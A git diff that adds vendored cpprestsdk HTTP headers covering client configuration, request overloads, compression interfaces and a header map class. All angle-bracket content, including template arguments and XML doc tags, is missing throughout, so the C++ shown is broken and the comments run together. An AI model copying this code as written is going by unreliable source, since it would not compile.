T timeout() const + { + return std::chrono::duration_cast(m_timeout); + } + /// + /// Set the timeout + /// + /// The timeout (duration from microseconds range and up) used for each send and receive + /// operation on the client. + template + void set_timeout(const T& timeout) + { + m_timeout = std::chrono::duration_cast(timeout); + } + + /// + /// Get the client chunk size. + /// + /// The internal buffer size used by the http client when sending and receiving data from the + /// network. + size_t chunksize() const { return m_chunksize == 0 ? 64 * 1024 : m_chunksize; } + + /// + /// Sets the client chunk size. + /// + /// The internal buffer size used by the http client when sending and receiving data from the + /// network. This is a hint -- an implementation may disregard the setting and use some other chunk + /// size. + void set_chunksize(size_t size) { m_chunksize = size; } + + /// + /// Returns true if the default chunk size is in use. + /// If true, implementations are allowed to choose whatever size is best. + /// + /// True if default, false if set by user. + bool is_default_chunksize() const { return m_chunksize == 0; } + + /// + /// Checks if requesting a compressed response using Content-Encoding is turned on, the default is off. + /// + /// True if a content-encoded compressed response is allowed, false otherwise + bool request_compressed_response() const { return m_request_compressed; } + + /// + /// Request that the server respond with a compressed body using Content-Encoding; to use Transfer-Encoding, do not + /// set this, and specify a vector of pointers + /// to the set_decompress_factories method of the object for the request. + /// If true and the server does not support compression, this will have no effect. + /// The response body is internally decompressed before the consumer receives the data. + /// + /// True to turn on content-encoded response body compression, false + /// otherwise. Please note there is a performance cost due to copying the request data. Currently + /// only supported on Windows and OSX. + void set_request_compressed_response(bool request_compressed) { m_request_compressed = request_compressed; } + +#if !defined(__cplusplus_winrt) + /// + /// Gets the server certificate validation property. + /// + /// True if certificates are to be verified, false otherwise. + bool validate_certificates() const { return m_validate_certificates; } + + /// + /// Sets the server certificate validation property. + /// + /// False to turn ignore all server certificate validation errors, true + /// otherwise. Note ignoring certificate errors can be dangerous and should be done with + /// caution. + void set_validate_certificates(bool validate_certs) { m_validate_certificates = validate_certs; } +#endif + +#if defined(_WIN32) && !defined(__cplusplus_winrt) + /// + /// Checks if request data buffering is turned on, the default is off. + /// + /// True if buffering is enabled, false otherwise + bool buffer_request() const { return m_buffer_request; } + + /// + /// Sets the request buffering property. + /// If true, in cases where the request body/stream doesn't support seeking the request data will be buffered. + /// This can help in situations where an authentication challenge might be expected. + /// + /// True to turn on buffer, false otherwise. + /// Please note there is a performance cost due to copying the request data. + void set_buffer_request(bool buffer_request) { m_buffer_request = buffer_request; } +#endif + + /// + /// Sets a callback to enable custom setting of platform specific options. + /// + /// + /// The native_handle is the following type depending on the underlying platform: + /// Windows Desktop, WinHTTP - HINTERNET (session) + /// + /// A user callback allowing for customization of the session + void set_nativesessionhandle_options(const std::function& callback) + { + m_set_user_nativesessionhandle_options = callback; + } + + /// + /// Invokes a user's callback to allow for customization of the session. + /// + /// Internal Use Only + /// A internal implementation handle. + void _invoke_nativesessionhandle_options(native_handle handle) const + { + if (m_set_user_nativesessionhandle_options) m_set_user_nativesessionhandle_options(handle); + } + + /// + /// Sets a callback to enable custom setting of platform specific options. + /// + /// + /// The native_handle is the following type depending on the underlying platform: + /// Windows Desktop, WinHTTP - HINTERNET + /// Windows Runtime, WinRT - IXMLHTTPRequest2 * + /// All other platforms, Boost.Asio: + /// https - boost::asio::ssl::stream * + /// http - boost::asio::ip::tcp::socket * + /// + /// A user callback allowing for customization of the request + void set_nativehandle_options(const std::function& callback) + { + m_set_user_nativehandle_options = callback; + } + + /// + /// Invokes a user's callback to allow for customization of the request. + /// + /// A internal implementation handle. + void invoke_nativehandle_options(native_handle handle) const + { + if (m_set_user_nativehandle_options) m_set_user_nativehandle_options(handle); + } + +#if !defined(_WIN32) && !defined(__cplusplus_winrt) || defined(CPPREST_FORCE_HTTP_CLIENT_ASIO) + /// + /// Sets a callback to enable custom setting of the ssl context, at construction time. + /// + /// A user callback allowing for customization of the ssl context at construction + /// time. + void set_ssl_context_callback(const std::function& callback) + { + m_ssl_context_callback = callback; + } + + /// + /// Gets the user's callback to allow for customization of the ssl context. + /// + const std::function& get_ssl_context_callback() const + { + return m_ssl_context_callback; + } + + /// + /// Gets the TLS extension server name indication (SNI) status. + /// + /// True if TLS server name indication is enabled, false otherwise. + bool is_tlsext_sni_enabled() const { return m_tlsext_sni_enabled; } + + /// + /// Sets the TLS extension server name indication (SNI) status. + /// + /// False to disable the TLS (ClientHello) extension for server name indication, + /// true otherwise. Note: This setting is enabled by default as it is required in most virtual + /// hosting scenarios. + void set_tlsext_sni_enabled(bool tlsext_sni_enabled) { m_tlsext_sni_enabled = tlsext_sni_enabled; } +#endif + +private: +#if !defined(CPPREST_TARGET_XP) + std::shared_ptr m_oauth1; +#endif + + std::shared_ptr m_oauth2; + web_proxy m_proxy; + http::client::credentials m_credentials; + // Whether or not to guarantee ordering, i.e. only using one underlying TCP connection. + bool m_guarantee_order; + + std::chrono::microseconds m_timeout; + size_t m_chunksize; + bool m_request_compressed; + +#if !defined(__cplusplus_winrt) + // IXmlHttpRequest2 doesn't allow configuration of certificate verification. + bool m_validate_certificates; +#endif + + std::function m_set_user_nativehandle_options; + std::function m_set_user_nativesessionhandle_options; + +#if !defined(_WIN32) && !defined(__cplusplus_winrt) || defined(CPPREST_FORCE_HTTP_CLIENT_ASIO) + std::function m_ssl_context_callback; + bool m_tlsext_sni_enabled; +#endif +#if defined(_WIN32) && !defined(__cplusplus_winrt) + bool m_buffer_request; +#endif +}; + +class http_pipeline; + +/// +/// HTTP client class, used to maintain a connection to an HTTP service for an extended session. +/// +class http_client +{ +public: + /// + /// Creates a new http_client connected to specified uri. + /// + /// A string representation of the base uri to be used for all requests. Must start with + /// either "http://" or "https://" + _ASYNCRTIMP http_client(const uri& base_uri); + + /// + /// Creates a new http_client connected to specified uri. + /// + /// A string representation of the base uri to be used for all requests. Must start with + /// either "http://" or "https://" The http client configuration object + /// containing the possible configuration options to initialize the http_client. + _ASYNCRTIMP http_client(const uri& base_uri, const http_client_config& client_config); + + /// + /// Note the destructor doesn't necessarily close the connection and release resources. + /// The connection is reference counted with the http_responses. + /// + _ASYNCRTIMP ~http_client() CPPREST_NOEXCEPT; + + /// + /// Gets the base URI. + /// + /// + /// A base URI initialized in constructor + /// + _ASYNCRTIMP const uri& base_uri() const; + + /// + /// Get client configuration object + /// + /// A reference to the client configuration object. + _ASYNCRTIMP const http_client_config& client_config() const; + + /// + /// Adds an HTTP pipeline stage to the client. + /// + /// A function object representing the pipeline stage. + _ASYNCRTIMP void add_handler(const std::function __cdecl( + http_request, std::shared_ptr)>& handler); + + /// + /// Adds an HTTP pipeline stage to the client. + /// + /// A shared pointer to a pipeline stage. + _ASYNCRTIMP void add_handler(const std::shared_ptr& stage); + + /// + /// Asynchronously sends an HTTP request. + /// + /// Request to send. + /// Cancellation token for cancellation of this request operation. + /// An asynchronous operation that is completed once a response from the request is received. + _ASYNCRTIMP pplx::task request( + http_request request, const pplx::cancellation_token& token = pplx::cancellation_token::none()); + + /// + /// Asynchronously sends an HTTP request. + /// + /// HTTP request method. + /// Cancellation token for cancellation of this request operation. + /// An asynchronous operation that is completed once a response from the request is received. + pplx::task request(const method& mtd, + const pplx::cancellation_token& token = pplx::cancellation_token::none()) + { + http_request msg(mtd); + return request(msg, token); + } + + /// + /// Asynchronously sends an HTTP request. + /// + /// HTTP request method. + /// String containing the path, query, and fragment, relative to the http_client's + /// base URI. Cancellation token for cancellation of this request operation. + /// An asynchronous operation that is completed once a response from the request is received. + pplx::task request(const method& mtd, + const utility::string_t& path_query_fragment, + const pplx::cancellation_token& token = pplx::cancellation_token::none()) + { + http_request msg(mtd); + msg.set_request_uri(path_query_fragment); + return request(msg, token); + } + + /// + /// Asynchronously sends an HTTP request. + /// + /// HTTP request method. + /// String containing the path, query, and fragment, relative to the http_client's + /// base URI. The data to be used as the message body, represented using the json + /// object library. Cancellation token for cancellation of this request + /// operation. An asynchronous operation that is completed once a response from the request is + /// received. + pplx::task request(const method& mtd, + const utility::string_t& path_query_fragment, + const json::value& body_data, + const pplx::cancellation_token& token = pplx::cancellation_token::none()) + { + http_request msg(mtd); + msg.set_request_uri(path_query_fragment); + msg.set_body(body_data); + return request(msg, token); + } + + /// + /// Asynchronously sends an HTTP request with a string body. Assumes the + /// character encoding of the string is UTF-8. + /// + /// HTTP request method. + /// String containing the path, query, and fragment, relative to the http_client's + /// base URI. A string holding the MIME type of the message body. String containing the text to use in the message body. Cancellation + /// token for cancellation of this request operation. An asynchronous operation that is completed + /// once a response from the request is received. + pplx::task request(const method& mtd, + const utf8string& path_query_fragment, + const utf8string& body_data, + const utf8string& content_type = "text/plain; charset=utf-8", + const pplx::cancellation_token& token = pplx::cancellation_token::none()) + { + http_request msg(mtd); + msg.set_request_uri(::utility::conversions::to_string_t(path_query_fragment)); + msg.set_body(body_data, content_type); + return request(msg, token); + } + + /// + /// Asynchronously sends an HTTP request with a string body. Assumes the + /// character encoding of the string is UTF-8. + /// + /// HTTP request method. + /// String containing the path, query, and fragment, relative to the http_client's + /// base URI. A string holding the MIME type of the message body. String containing the text to use in the message body. Cancellation + /// token for cancellation of this request operation. An asynchronous operation that is completed + /// once a response from the request is received. + pplx::task request(const method& mtd, + const utf8string& path_query_fragment, + utf8string&& body_data, + const utf8string& content_type = "text/plain; charset=utf-8", + const pplx::cancellation_token& token = pplx::cancellation_token::none()) + { + http_request msg(mtd); + msg.set_request_uri(::utility::conversions::to_string_t(path_query_fragment)); + msg.set_body(std::move(body_data), content_type); + return request(msg, token); + } + + /// + /// Asynchronously sends an HTTP request with a string body. Assumes the + /// character encoding of the string is UTF-16 will perform conversion to UTF-8. + /// + /// HTTP request method. + /// String containing the path, query, and fragment, relative to the http_client's + /// base URI. A string holding the MIME type of the message body. String containing the text to use in the message body. Cancellation + /// token for cancellation of this request operation. An asynchronous operation that is completed + /// once a response from the request is received. + pplx::task request( + const method& mtd, + const utf16string& path_query_fragment, + const utf16string& body_data, + const utf16string& content_type = utility::conversions::to_utf16string("text/plain"), + const pplx::cancellation_token& token = pplx::cancellation_token::none()) + { + http_request msg(mtd); + msg.set_request_uri(::utility::conversions::to_string_t(path_query_fragment)); + msg.set_body(body_data, content_type); + return request(msg, token); + } + + /// + /// Asynchronously sends an HTTP request with a string body. Assumes the + /// character encoding of the string is UTF-8. + /// + /// HTTP request method. + /// String containing the path, query, and fragment, relative to the http_client's + /// base URI. String containing the text to use in the message body. Cancellation token for cancellation of this request operation. An asynchronous + /// operation that is completed once a response from the request is received. + pplx::task request(const method& mtd, + const utf8string& path_query_fragment, + const utf8string& body_data, + const pplx::cancellation_token& token) + { + return request(mtd, path_query_fragment, body_data, "text/plain; charset=utf-8", token); + } + + /// + /// Asynchronously sends an HTTP request with a string body. Assumes the + /// character encoding of the string is UTF-8. + /// + /// HTTP request method. + /// String containing the path, query, and fragment, relative to the http_client's + /// base URI. String containing the text to use in the message body. Cancellation token for cancellation of this request operation. An asynchronous + /// operation that is completed once a response from the request is received. + pplx::task request(const method& mtd, + const utf8string& path_query_fragment, + utf8string&& body_data, + const pplx::cancellation_token& token) + { + http_request msg(mtd); + msg.set_request_uri(::utility::conversions::to_string_t(path_query_fragment)); + msg.set_body(std::move(body_data), "text/plain; charset=utf-8"); + return request(msg, token); + } + + /// + /// Asynchronously sends an HTTP request with a string body. Assumes + /// the character encoding of the string is UTF-16 will perform conversion to UTF-8. + /// + /// HTTP request method. + /// String containing the path, query, and fragment, relative to the http_client's + /// base URI. String containing the text to use in the message body. Cancellation token for cancellation of this request operation. An asynchronous + /// operation that is completed once a response from the request is received. + pplx::task request(const method& mtd, + const utf16string& path_query_fragment, + const utf16string& body_data, + const pplx::cancellation_token& token) + { + return request( + mtd, path_query_fragment, body_data, ::utility::conversions::to_utf16string("text/plain"), token); + } + +#if !defined(__cplusplus_winrt) + /// + /// Asynchronously sends an HTTP request. + /// + /// HTTP request method. + /// String containing the path, query, and fragment, relative to the http_client's + /// base URI. An asynchronous stream representing the body data. A string holding the MIME type of the message body. Cancellation + /// token for cancellation of this request operation. A task that is completed once a response from + /// the request is received. + pplx::task request(const method& mtd, + const utility::string_t& path_query_fragment, + const concurrency::streams::istream& body, + const utility::string_t& content_type = _XPLATSTR("application/octet-stream"), + const pplx::cancellation_token& token = pplx::cancellation_token::none()) + { + http_request msg(mtd); + msg.set_request_uri(path_query_fragment); + msg.set_body(body, content_type); + return request(msg, token); + } + + /// + /// Asynchronously sends an HTTP request. + /// + /// HTTP request method. + /// String containing the path, query, and fragment, relative to the http_client's + /// base URI. An asynchronous stream representing the body data. Cancellation token for cancellation of this request operation. A task that is + /// completed once a response from the request is received. + pplx::task request(const method& mtd, + const utility::string_t& path_query_fragment, + const concurrency::streams::istream& body, + const pplx::cancellation_token& token) + { + return request(mtd, path_query_fragment, body, _XPLATSTR("application/octet-stream"), token); + } +#endif // __cplusplus_winrt + + /// + /// Asynchronously sends an HTTP request. + /// + /// HTTP request method. + /// String containing the path, query, and fragment, relative to the http_client's + /// base URI. An asynchronous stream representing the body data. Size of the message body. A string holding the MIME + /// type of the message body. Cancellation token for cancellation of this request + /// operation. A task that is completed once a response from the request is received. + /// Winrt requires to provide content_length. + pplx::task request(const method& mtd, + const utility::string_t& path_query_fragment, + const concurrency::streams::istream& body, + size_t content_length, + const utility::string_t& content_type = _XPLATSTR("application/octet-stream"), + const pplx::cancellation_token& token = pplx::cancellation_token::none()) + { + http_request msg(mtd); + msg.set_request_uri(path_query_fragment); + msg.set_body(body, content_length, content_type); + return request(msg, token); + } + + /// + /// Asynchronously sends an HTTP request. + /// + /// HTTP request method. + /// String containing the path, query, and fragment, relative to the http_client's + /// base URI. An asynchronous stream representing the body data. Size of the message body. Cancellation token for cancellation + /// of this request operation. A task that is completed once a response from the request is + /// received. Winrt requires to provide content_length. + pplx::task request(const method& mtd, + const utility::string_t& path_query_fragment, + const concurrency::streams::istream& body, + size_t content_length, + const pplx::cancellation_token& token) + { + return request(mtd, path_query_fragment, body, content_length, _XPLATSTR("application/octet-stream"), token); + } + +private: + std::shared_ptr<::web::http::client::http_pipeline> m_pipeline; +}; + +namespace details +{ +#if defined(_WIN32) +extern const utility::char_t* get_with_body_err_msg; +#endif + +} // namespace details + +} // namespace client +} // namespace http +} // namespace web + +#endif diff --git a/Src/Common/CppRestSdk/include/cpprest/http_compression.h b/Src/Common/CppRestSdk/include/cpprest/http_compression.h new file mode 100644 index 0000000..b0059a6 --- /dev/null +++ b/Src/Common/CppRestSdk/include/cpprest/http_compression.h @@ -0,0 +1,326 @@ +/*** + * Copyright (C) Microsoft. All rights reserved. + * Licensed under the MIT license. See LICENSE.txt file in the project root for full license information. + * + * =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ + * + * HTTP Library: Compression and decompression interfaces + * + * For the latest on this and related APIs, please see: https://github.com/Microsoft/cpprestsdk + * + * =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- + ****/ +#pragma once + +namespace web +{ +namespace http +{ +namespace compression +{ +/// +/// Hint as to whether a compress or decompress call is meant to be the last for a particular HTTP request or reply +/// +enum operation_hint +{ + is_last, // Used for the expected last compress() call, or for an expected single decompress() call + has_more // Used when further compress() calls will be made, or when multiple decompress() calls may be required +}; + +/// +/// Result structure for asynchronous compression and decompression operations +/// +struct operation_result +{ + size_t input_bytes_processed; // From the input buffer + size_t output_bytes_produced; // To the output buffer + bool done; // For compress, set when 'last' is true and there was enough space to complete compression; + // for decompress, set if the end of the decompression stream has been reached +}; + +/// +/// Compression interface for use with HTTP requests +/// +class compress_provider +{ +public: + virtual const utility::string_t& algorithm() const = 0; + virtual size_t compress(const uint8_t* input, + size_t input_size, + uint8_t* output, + size_t output_size, + operation_hint hint, + size_t& input_bytes_processed, + bool& done) = 0; + virtual pplx::task compress( + const uint8_t* input, size_t input_size, uint8_t* output, size_t output_size, operation_hint hint) = 0; + virtual void reset() = 0; + virtual ~compress_provider() = default; +}; + +/// +/// Decompression interface for use with HTTP requests +/// +class decompress_provider +{ +public: + virtual const utility::string_t& algorithm() const = 0; + virtual size_t decompress(const uint8_t* input, + size_t input_size, + uint8_t* output, + size_t output_size, + operation_hint hint, + size_t& input_bytes_processed, + bool& done) = 0; + virtual pplx::task decompress( + const uint8_t* input, size_t input_size, uint8_t* output, size_t output_size, operation_hint hint) = 0; + virtual void reset() = 0; + virtual ~decompress_provider() = default; +}; + +/// +/// Factory interface for compressors for use with received HTTP requests +/// +class compress_factory +{ +public: + virtual const utility::string_t& algorithm() const = 0; + virtual std::unique_ptr make_compressor() const = 0; + virtual ~compress_factory() = default; +}; + +/// +/// Factory interface for decompressors for use with HTTP requests +/// +class decompress_factory +{ +public: + virtual const utility::string_t& algorithm() const = 0; + virtual uint16_t weight() const = 0; + virtual std::unique_ptr make_decompressor() const = 0; + virtual ~decompress_factory() = default; +}; + +/// +/// Built-in compression support +/// +namespace builtin +{ +/// +/// Test whether cpprestsdk was built with built-in compression support +/// True if cpprestsdk was built with built-in compression support, and false if not. +/// +_ASYNCRTIMP bool supported(); + +/// +// String constants for each built-in compression algorithm, for convenient use with the factory functions +/// +namespace algorithm +{ +#if defined(_MSC_VER) && _MSC_VER < 1900 +const utility::char_t* const GZIP = _XPLATSTR("gzip"); +const utility::char_t* const DEFLATE = _XPLATSTR("deflate"); +const utility::char_t* const BROTLI = _XPLATSTR("br"); +#else // ^^^ VS2013 and before ^^^ // vvv VS2015+, and everything else vvv +constexpr const utility::char_t* const GZIP = _XPLATSTR("gzip"); +constexpr const utility::char_t* const DEFLATE = _XPLATSTR("deflate"); +constexpr const utility::char_t* const BROTLI = _XPLATSTR("br"); +#endif + +/// +/// Test whether cpprestsdk was built with built-in compression support and +/// the supplied string matches a supported built-in algorithm +/// The name of the algorithm to test for built-in support. +/// True if cpprestsdk was built with built-in compression support and +/// the supplied string matches a supported built-in algorithm, and false if not. +/// +_ASYNCRTIMP bool supported(const utility::string_t& algorithm); +} // namespace algorithm + +/// +/// Factory function to instantiate a built-in compression provider with default parameters by compression algorithm +/// name. +/// +/// The name of the algorithm for which to instantiate a provider. +/// +/// A caller-owned pointer to a provider of the requested-type, or to nullptr if no such built-in type exists. +/// +_ASYNCRTIMP std::unique_ptr make_compressor(const utility::string_t& algorithm); + +/// +/// Factory function to instantiate a built-in decompression provider with default parameters by compression algorithm +/// name. +/// +/// The name of the algorithm for which to instantiate a provider. +/// +/// A caller-owned pointer to a provider of the requested-type, or to nullptr if no such built-in type exists. +/// +_ASYNCRTIMP std::unique_ptr make_decompressor(const utility::string_t& algorithm); + +/// +/// Factory function to obtain a pointer to a built-in compression provider factory by compression algorithm name. +/// +/// The name of the algorithm for which to find a factory. +/// +/// A caller-owned pointer to a provider of the requested-type, or to nullptr if no such built-in type exists. +/// +_ASYNCRTIMP std::shared_ptr get_compress_factory(const utility::string_t& algorithm); + +/// +/// Factory function to obtain a pointer to a built-in decompression provider factory by compression algorithm name. +/// +/// The name of the algorithm for which to find a factory. +/// +/// A caller-owned pointer to a provider of the requested-type, or to nullptr if no such built-in type exists. +/// +_ASYNCRTIMP std::shared_ptr get_decompress_factory(const utility::string_t& algorithm); + +/// +// Factory function to instantiate a built-in gzip compression provider with caller-selected parameters. +/// +/// +/// A caller-owned pointer to a gzip compression provider, or to nullptr if the library was built without built-in +/// compression support. +/// +_ASYNCRTIMP std::unique_ptr make_gzip_compressor(int compressionLevel, + int method, + int strategy, + int memLevel); + +/// +// Factory function to instantiate a built-in deflate compression provider with caller-selected parameters. +/// +/// +/// A caller-owned pointer to a deflate compression provider, or to nullptr if the library was built without built-in +/// compression support.. +/// +_ASYNCRTIMP std::unique_ptr make_deflate_compressor(int compressionLevel, + int method, + int strategy, + int memLevel); + +/// +// Factory function to instantiate a built-in Brotli compression provider with caller-selected parameters. +/// +/// +/// A caller-owned pointer to a Brotli compression provider, or to nullptr if the library was built without built-in +/// compression support. +/// +_ASYNCRTIMP std::unique_ptr make_brotli_compressor( + uint32_t window, uint32_t quality, uint32_t mode, uint32_t block, uint32_t nomodel, uint32_t hint); +} // namespace builtin + +/// +/// Factory function to instantiate a compression provider factory by compression algorithm name. +/// +/// The name of the algorithm supported by the factory. Must match that returned by the +/// web::http::compression::compress_provider type instantiated by the factory's make_compressor function. +/// The supplied string is copied, and thus need not remain valid once the call returns. +/// A factory function to be used to instantiate a compressor matching the factory's +/// reported algorithm. +/// +/// A pointer to a generic provider factory implementation configured with the supplied parameters. +/// +/// +/// This method may be used to conveniently instantiate a factory object for a caller-selected compress_provider. +/// That provider may be of the caller's own design, or it may be one of the built-in types. As such, this method may +/// be helpful when a caller wishes to build vectors containing a mix of custom and built-in providers. +/// +_ASYNCRTIMP std::shared_ptr make_compress_factory( + const utility::string_t& algorithm, std::function()> make_compressor); + +/// +/// Factory function to instantiate a decompression provider factory by compression algorithm name. +/// +/// The name of the algorithm supported by the factory. Must match that returned by the +/// web::http::compression::decompress_provider type instantiated by the factory's make_decompressor function. +/// The supplied string is copied, and thus need not remain valid once the call returns. +/// A numeric weight for the compression algorithm, times 1000, for use as a "quality value" when +/// requesting that the server send a compressed response. Valid values are between 0 and 1000, inclusive, where higher +/// values indicate more preferred algorithms, and 0 indicates that the algorithm is not allowed; values greater than +/// 1000 are treated as 1000. +/// A factory function to be used to instantiate a decompressor matching the factory's +/// reported algorithm. +/// +/// A pointer to a generic provider factory implementation configured with the supplied parameters. +/// +/// +/// This method may be used to conveniently instantiate a factory object for a caller-selected +/// decompress_provider. That provider may be of the caller's own design, or it may be one of the built-in +/// types. As such, this method may be helpful when a caller wishes to change the weights of built-in provider types, +/// to use custom providers without explicitly implementing a decompress_factory, or to build vectors containing +/// a mix of custom and built-in providers. +/// +_ASYNCRTIMP std::shared_ptr make_decompress_factory( + const utility::string_t& algorithm, + uint16_t weight, + std::function()> make_decompressor); + +namespace details +{ +/// +/// Header type enum for use with compressor and decompressor header parsing and building functions +/// +enum header_types +{ + transfer_encoding, + content_encoding, + te, + accept_encoding +}; + +/// +/// Factory function to instantiate an appropriate compression provider, if any. +/// +/// A TE or Accept-Encoding header to interpret. +/// Specifies the type of header whose contents are in the encoding parameter; valid values are +/// header_type::te and header_type::accept_encoding. +/// A compressor object of the caller's preferred (possibly custom) type, which is used if +/// possible. +/// A collection of factory objects for use in construction of an appropriate compressor, if +/// any. If empty or not supplied, the set of supported built-in compressors is used. +/// +/// A pointer to a compressor object that is acceptable per the supplied header, or to nullptr if no matching +/// algorithm is found. +/// +_ASYNCRTIMP std::unique_ptr get_compressor_from_header( + const utility::string_t& encoding, + header_types type, + const std::vector>& factories = std::vector>()); + +/// +/// Factory function to instantiate an appropriate decompression provider, if any. +/// +/// A Transfer-Encoding or Content-Encoding header to interpret. +/// Specifies the type of header whose contents are in the encoding parameter; valid values are +/// header_type::transfer_encoding and header_type::content_encoding. +/// A collection of factory objects for use in construction of an appropriate decompressor, +/// if any. If empty or not supplied, the set of supported built-in compressors is used. +/// +/// A pointer to a decompressor object that is acceptable per the supplied header, or to nullptr if no matching +/// algorithm is found. +/// +_ASYNCRTIMP std::unique_ptr get_decompressor_from_header( + const utility::string_t& encoding, + header_types type, + const std::vector>& factories = + std::vector>()); + +/// +/// Helper function to compose a TE or Accept-Encoding header with supported, and possibly ranked, compression +/// algorithms. +/// +/// Specifies the type of header to be built; valid values are header_type::te and +/// header_type::accept_encoding. +/// A collection of factory objects for use in header construction. If empty or not +/// supplied, the set of supported built-in compressors is used. +/// +/// A well-formed header, without the header name, specifying the acceptable ranked compression types. +/// +_ASYNCRTIMP utility::string_t build_supported_header(header_types type, + const std::vector>& factories = + std::vector>()); +} // namespace details +} // namespace compression +} // namespace http +} // namespace web diff --git a/Src/Common/CppRestSdk/include/cpprest/http_headers.h b/Src/Common/CppRestSdk/include/cpprest/http_headers.h new file mode 100644 index 0000000..3315537 --- /dev/null +++ b/Src/Common/CppRestSdk/include/cpprest/http_headers.h @@ -0,0 +1,322 @@ +/*** + * Copyright (C) Microsoft. All rights reserved. + * Licensed under the MIT license. See LICENSE.txt file in the project root for full license information. + * + * =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ + * + * For the latest on this and related APIs, please see: https://github.com/Microsoft/cpprestsdk + * + * =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- + ****/ +#pragma once + +#include "Common/CppRestSdk/include/cpprest/asyncrt_utils.h" +#include +#include +#include +#include +#include + +namespace web +{ +namespace http +{ +/// +/// Binds an individual reference to a string value. +/// +/// The type of string value. +/// The type of the value to bind to. +/// The string value. +/// The value to bind to. +/// true if the binding succeeds, false otherwise. +template +CASABLANCA_DEPRECATED("This API is deprecated and will be removed in a future release, std::istringstream instead.") +bool bind(const key_type& text, _t& ref) // const +{ + utility::istringstream_t iss(text); + iss >> ref; + if (iss.fail() || !iss.eof()) + { + return false; + } + + return true; +} + +/// +/// Binds an individual reference to a string value. +/// This specialization is need because istringstream::>> delimits on whitespace. +/// +/// The type of the string value. +/// The string value. +/// The value to bind to. +/// true if the binding succeeds, false otherwise. +template +CASABLANCA_DEPRECATED("This API is deprecated and will be removed in a future release.") +bool bind(const key_type& text, utility::string_t& ref) // const +{ + ref = text; + return true; +} + +namespace details +{ +template +bool bind_impl(const key_type& text, _t& ref) +{ + utility::istringstream_t iss(text); + iss.imbue(std::locale::classic()); + iss >> ref; + if (iss.fail() || !iss.eof()) + { + return false; + } + + return true; +} + +template +bool bind_impl(const key_type& text, utf16string& ref) +{ + ref = utility::conversions::to_utf16string(text); + return true; +} + +template +bool bind_impl(const key_type& text, std::string& ref) +{ + ref = utility::conversions::to_utf8string(text); + return true; +} +} // namespace details + +/// +/// Represents HTTP headers, acts like a map. +/// +class http_headers +{ +public: + /// Function object to perform case insensitive comparison of wstrings. + struct _case_insensitive_cmp + { + bool operator()(const utility::string_t& str1, const utility::string_t& str2) const + { + return utility::details::str_iless(str1, str2); + } + }; + +private: + typedef std::map inner_container; + +public: + /// + /// STL-style typedefs + /// + typedef inner_container::key_type key_type; + typedef inner_container::key_compare key_compare; + typedef inner_container::allocator_type allocator_type; + typedef inner_container::size_type size_type; + typedef inner_container::difference_type difference_type; + typedef inner_container::pointer pointer; + typedef inner_container::const_pointer const_pointer; + typedef inner_container::reference reference; + typedef inner_container::const_reference const_reference; + typedef inner_container::iterator iterator; + typedef inner_container::const_iterator const_iterator; + typedef inner_container::reverse_iterator reverse_iterator; + typedef inner_container::const_reverse_iterator const_reverse_iterator; + + /// + /// Constructs an empty set of HTTP headers. + /// + http_headers() {} + + /// + /// Copy constructor. + /// + /// An http_headers object to copy from. + http_headers(const http_headers& other) : m_headers(other.m_headers) {} + + /// + /// Assignment operator. + /// + /// An http_headers object to copy from. + http_headers& operator=(const http_headers& other) + { + if (this != &other) + { + m_headers = other.m_headers; + } + return *this; + } + + /// + /// Move constructor. + /// + /// An http_headers object to move. + http_headers(http_headers&& other) : m_headers(std::move(other.m_headers)) {} + + /// + /// Move assignment operator. + /// + /// An http_headers object to move. + http_headers& operator=(http_headers&& other) + { + if (this != &other) + { + m_headers = std::move(other.m_headers); + } + return *this; + } + + /// + /// Adds a header field using the '<<' operator. + /// + /// The name of the header field. + /// The value of the header field. + /// If the header field exists, the value will be combined as comma separated string. + template + void add(const key_type& name, const _t1& value) + { + auto printedValue = utility::conversions::details::print_string(value); + auto& mapVal = m_headers[name]; + if (mapVal.empty()) + { + mapVal = std::move(printedValue); + } + else + { + mapVal.append(_XPLATSTR(", ")).append(std::move(printedValue)); + } + } + + /// + /// Removes a header field. + /// + /// The name of the header field. + void remove(const key_type& name) { m_headers.erase(name); } + + /// + /// Removes all elements from the headers. + /// + void clear() { m_headers.clear(); } + + /// + /// Checks if there is a header with the given key. + /// + /// The name of the header field. + /// true if there is a header with the given name, false otherwise. + bool has(const key_type& name) const { return m_headers.find(name) != m_headers.end(); } + + /// + /// Returns the number of header fields. + /// + /// Number of header fields. + size_type size() const { return m_headers.size(); } + + /// + /// Tests to see if there are any header fields. + /// + /// true if there are no headers, false otherwise. + bool empty() const { return m_headers.empty(); } + + /// + /// Returns a reference to header field with given name, if there is no header field one is inserted. + /// + utility::string_t& operator[](const key_type& name) { return m_headers[name]; } + + /// + /// Checks if a header field exists with given name and returns an iterator if found. Otherwise + /// and iterator to end is returned. + /// + /// The name of the header field. + /// An iterator to where the HTTP header is found. + iterator find(const key_type& name) { return m_headers.find(name); } + const_iterator find(const key_type& name) const { return m_headers.find(name); } + + /// + /// Attempts to match a header field with the given name using the '>>' operator. + /// + /// The name of the header field. + /// The value of the header field. + /// true if header field was found and successfully stored in value parameter. + template + bool match(const key_type& name, _t1& value) const + { + auto iter = m_headers.find(name); + if (iter == m_headers.end()) + { + return false; + } + + return web::http::details::bind_impl(iter->second, value) || iter->second.empty(); + } + + /// + /// Returns an iterator referring to the first header field. + /// + /// An iterator to the beginning of the HTTP headers + iterator begin() { return m_headers.begin(); } + const_iterator begin() const { return m_headers.begin(); } + + /// + /// Returns an iterator referring to the past-the-end header field. + /// + /// An iterator to the element past the end of the HTTP headers. + iterator end() { return m_headers.end(); } + const_iterator end() const { return m_headers.end(); } + + /// + /// Gets the content length of the message. + /// + /// The length of the content. + _ASYNCRTIMP utility::size64_t content_length() const; + + /// + /// Sets the content length of the message. + /// + /// The length of the content. + _ASYNCRTIMP void set_content_length(utility::size64_t length); + + /// + /// Gets the content type of the message. + /// + /// The 